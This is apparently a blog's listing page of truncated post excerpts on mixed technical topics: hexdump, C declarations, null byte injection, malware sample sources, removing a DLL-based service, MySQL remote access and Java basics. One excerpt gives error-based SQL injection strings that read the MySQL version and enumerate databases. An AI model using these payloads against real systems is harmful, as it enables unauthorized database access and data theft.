摘要:
hexdumphexdump命令一般用来查看”二进制“文件的十六进制编码,但实际上它的用途不止如此,手册页上的说法是“ascii, decimal, hexadecimal, octal dump“,而且它能查看任何文件,而不只限于二进制文件了。规范的十六进制和ASCII码显示(Canonical hex+ASCII display)root@new55 ~]# echo /etc/passwd | hexdump -C00000000 2f 65 74 63 2f 70 61 73 73 77 64 0a |/etc/passwd.|0000000c单字节八进制... 阅读全文
摘要:
複雜宣告的讀法文法,最令我印象深刻的,莫過於印度工程師Vikram的"The right-left rule"。他是這麼說的:「從最內層的括號讀起,變數名稱,然後往右,遇到括號就往左。當括號內的東西都解讀完畢了,就跳出括號繼續未完成的部份,重覆上面的步驟直到解讀完畢。」舉個例子:void ** (*d) (int &, char*)依下面方式解讀:1. 最內層括號的讀起,變數名稱: d2. 往右直到碰到) : (空白)3. 往左直到碰到( :是一個函數指標4. 跳出括號,往右,碰到(int &, char*): 此函式接受兩個參數:第一個參數是referen 阅读全文
摘要:
Project:WASC Threat ClassificationThreat Type:AttackReference ID: WASC-28Null Byte InjectionNull Byte Injection is an active exploitation technique used to bypass sanity checking filters in web infrastructure by adding URL-encoded null byte characters (i.e. %00, or 0x00 in hex) to the user-supplied 阅读全文
摘要:
1、查看MYSQL版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0×27,schema_name,0×27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from 阅读全文
摘要:
Malware Sample Sources for ResearchersMalware researchers have the need to collect malware samples to research threat techniques and develop defenses. Researchers cancollect such samples using honeypots. They can also download samples fromknown malicious URLs. They can also obtain malware samples fr 阅读全文
摘要:
看了Executing DLLs as a Windows Service這篇文章後終於知道是怎麼一回事了,於是把相關的register value 砍掉,用sc delete "Server_name"砍掉Windows Service。再找出對應的random.dll找出他修改日期。再搜出相關檔案一併移除。https://code.google.com/p/malwarecookbook/source/browse/trunk/13/7/install_svc.pyRecipe 13-7:Executing DLLs as a Windows ServiceYou ca 阅读全文
摘要:
Recover System AccessInsert your Windows startup CD into your CD-ROM drive and reboot your computer. Having a CD loaded during boot up may trigger a series of prompts. Select any option in the prompt consistent with instructing your computer to start from the CD-ROM drive.Press "R" on your 阅读全文
摘要:
1.final final double PI = 3.14; PI=3 會出錯,類似C language 的const2.break , continue in loop break:直接跳出迴圈 continue:只略過下一個statement3.class Clothes c1 = new Clothes(); Clothes is a class c1 is a object by defineClothes import java.util.Scanner; <--使用一個標準類別4.Java 分 為兩種型態: 基本型態(想成C原有的)、類別型態 其中類別型態定義出 obje. 阅读全文
摘要:
y default, MySQL does not allow remote clients to connect to the MySQL database.If you try to connect to a remote MySQL database from your client system, you will get “ERROR 1130: Host is not allowed to connect to this MySQL server” message as shown below.$ mysql -h 192.168.1.8 -u root -pEnter passw 阅读全文
摘要:
此篇文章 內容大部份連結 已失效, 我已另外寫一篇更快速安裝的文章。前言: 網路遊戲天堂在數年前,被日本人分析封包的方式。模擬出Lineage server端的行為。 不像天堂II,及RO是由內部洩漏出Server端程式。也由於天堂Server的熱門以至於私服人人到處架。 ... 阅读全文